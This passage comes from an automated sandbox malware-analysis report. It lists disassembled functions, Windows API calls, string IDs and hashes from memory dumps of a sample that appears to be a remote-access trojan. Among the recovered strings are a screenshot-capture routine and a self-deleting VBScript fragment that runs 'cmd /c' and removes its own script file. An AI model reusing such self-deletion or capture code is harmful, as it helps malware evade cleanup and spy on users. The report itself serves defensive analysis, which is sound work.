                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                                                                                                                                                                                                                                              • String ID: \ws2_32$\wship6$getaddrinfo
                                                                                                                                                                                                                                                                                                                              • API String ID: 2490988753-3078833738
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 7f25833e8af2b845701e4bccc7340468b757da4176a2c43d0743638068d0b7b5
                                                                                                                                                                                                                                                                                                                              • Instruction ID: f97e29e5006070a0e8b03c0efb597ee3aef86c3529fe4be05370ae17daaf5a45
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f25833e8af2b845701e4bccc7340468b757da4176a2c43d0743638068d0b7b5
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C331C4B1906315ABD320AF65DC44ACBB7ECEF44745F400A2AF844D7201D778DA858AEE
                                                                                                                                                                                                                                                                                                                              Function 0045007D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • ___free_lconv_mon.LIBCMT ref: 004500C1
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F310
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F322
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F334
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F346
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F358
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F36A
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F37C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F38E
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3A0
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3B2
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3C4
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3D6
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3E8
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 004500B6
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 004500D8
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 004500ED
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 004500F8
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0045011A
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0045012D
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0045013B
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00450146
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0045017E
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00450185
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 004501A2
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 004501BA
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 161543041-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 71386be3831ae4e36ed8ba8c0666741f952bc44bbd11cc85bbb3aa2ad55dcdb0
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5318135600B009FEB30AA39D845B5773E9EF02325F11842FE849E7692DF79AD88C719
                                                                                                                                                                                                                                                                                                                              Function 02837CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • ___free_lconv_mon.LIBCMT ref: 02837D06
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028390BA: _free.LIBCMT ref: 028390D7
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028390BA: _free.LIBCMT ref: 028390E9
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028390BA: _free.LIBCMT ref: 028390FB
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028390BA: _free.LIBCMT ref: 0283910D
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028390BA: _free.LIBCMT ref: 0283911F
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028390BA: _free.LIBCMT ref: 02839131
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028390BA: _free.LIBCMT ref: 02839143
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028390BA: _free.LIBCMT ref: 02839155
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028390BA: _free.LIBCMT ref: 02839167
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028390BA: _free.LIBCMT ref: 02839179
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028390BA: _free.LIBCMT ref: 0283918B
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028390BA: _free.LIBCMT ref: 0283919D
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028390BA: _free.LIBCMT ref: 028391AF
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02837CFB
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0283571E: HeapFree.KERNEL32(00000000,00000000,?,0283924F,?,00000000,?,00000000,?,02839276,?,00000007,?,?,02837E5A,?), ref: 02835734
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0283571E: GetLastError.KERNEL32(?,?,0283924F,?,00000000,?,00000000,?,02839276,?,00000007,?,?,02837E5A,?,?), ref: 02835746
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02837D1D
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02837D32
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02837D3D
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02837D5F
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02837D72
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02837D80
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02837D8B
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02837DC3
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02837DCA
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02837DE7
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02837DFF
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 161543041-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 89f3a7de5934e40ee2660ec80b737bda53924e820bed116327d2a09b621a83be
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 1aa321fe867bddff2fc633ca23a1a02ca41bac463ced5539e83f709b5ffae378
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 89f3a7de5934e40ee2660ec80b737bda53924e820bed116327d2a09b621a83be
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 58315CBD610204DFEB33AA38D944B6AB7EAEF04314F544869E848DB194DF75F980CB91
                                                                                                                                                                                                                                                                                                                              Function 1001A085 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • ___free_lconv_mon.LIBCMT ref: 1001A0C9
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CBB4
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CBC6
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CBD8
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CBEA
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CBFC
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CC0E
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CC20
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CC32
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CC44
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CC56
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CC68
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CC7A
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CC8C
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001A0BE
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10015A65: RtlFreeHeap.NTDLL(00000000,00000000,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?), ref: 10015A7B
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10015A65: GetLastError.KERNEL32(?,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?,?), ref: 10015A8D
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001A0E0
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001A0F5
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001A100
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001A122
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001A135
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001A143
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001A14E
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001A186
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001A18D
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001A1AA
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001A1C2
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 161543041-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: be70f43cd3f780db0588d603a309c755db6f60602458a46c6275e532dd52c23e
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 644937dc1452572f85b35f0ffe035dbca8845510b282740a5666290ef4fc3b73
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: be70f43cd3f780db0588d603a309c755db6f60602458a46c6275e532dd52c23e
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09315736600601EFEB21CA78D885B4A73E8EF46391F994519E499DE151DF36FDC08A21
                                                                                                                                                                                                                                                                                                                              Function 00419138 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 174sleeptimeCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 0041913D
                                                                                                                                                                                                                                                                                                                              • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041916F
                                                                                                                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191FB
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0041927D
                                                                                                                                                                                                                                                                                                                              • GetLocalTime.KERNEL32(?), ref: 0041928C
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419375
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                                                                                                                                                                                                                                              • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                                                                                                                                                                                                                                              • API String ID: 489098229-65789007
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 163140df36800be4b3eac6d7f358801d8c1f09a0d5614bff15ad32f995455d69
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 451d4021779863bb8065bd5e36f4a774b326d3833db1a6038cb7dac0f018a91b
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 163140df36800be4b3eac6d7f358801d8c1f09a0d5614bff15ad32f995455d69
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56519071A002449ACB14BBB5D866AFE7BA9AB45304F00407FF849B71D2EF3C5D85C799
                                                                                                                                                                                                                                                                                                                              Function 0040C66D Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 147COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                                                                                                                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                                                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040C832
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                                                                                                                                                                                                                                              • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                                                                                                                                                                                                                                              • API String ID: 1913171305-390638927
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 65ce5a23448985827e99353dcf73aa1791ce73ebb505981bcb27117b7cdeae56
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 3122975e65398275e0c1a8e950e5c558235310b29c64ef4ed93c25b66c9664dc
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 65ce5a23448985827e99353dcf73aa1791ce73ebb505981bcb27117b7cdeae56
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A6414C329001185ACB14F761DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                                                                                                                                                                                                                                                                                                              Function 0044F3F1 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                                                                                                                                                                                                                                              • Instruction ID: d73775b2238990a9214358b8270f61d1b8324a28925b392a315ea9bfa7ac6158
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 89C16672D40204AFEB20DBA8CC82FEF77F8AB05714F15446AFA44FB282D6749D458768
                                                                                                                                                                                                                                                                                                                              Function 00454992 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00454660: CreateFileW.KERNEL32(00000000,?,?,;JE,?,?,00000000,?,00454A3B,00000000,0000000C), ref: 0045467D
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00454AA6
                                                                                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00454AAD
                                                                                                                                                                                                                                                                                                                              • GetFileType.KERNEL32(00000000), ref: 00454AB9
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00454AC3
                                                                                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00454ACC
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00454AEC
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00454C36
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00454C68
                                                                                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00454C6F
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                                                                                              • String ID: H
                                                                                                                                                                                                                                                                                                                              • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 6ee1e536fdc7f2f0b5cfdc99f6d3f503e334a2caa4375aff0222a5d39aa192cc
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 2939135f81ce6efcdbf1290aa78a9ad6619f21b9340f77aa2193fadd435c2af6
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ee1e536fdc7f2f0b5cfdc99f6d3f503e334a2caa4375aff0222a5d39aa192cc
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9FA13732A041448FDF19DF68D8527AE7BA0EB46329F14015EFC019F392DB399C96C75A
                                                                                                                                                                                                                                                                                                                              Function 00413C67 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 155COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
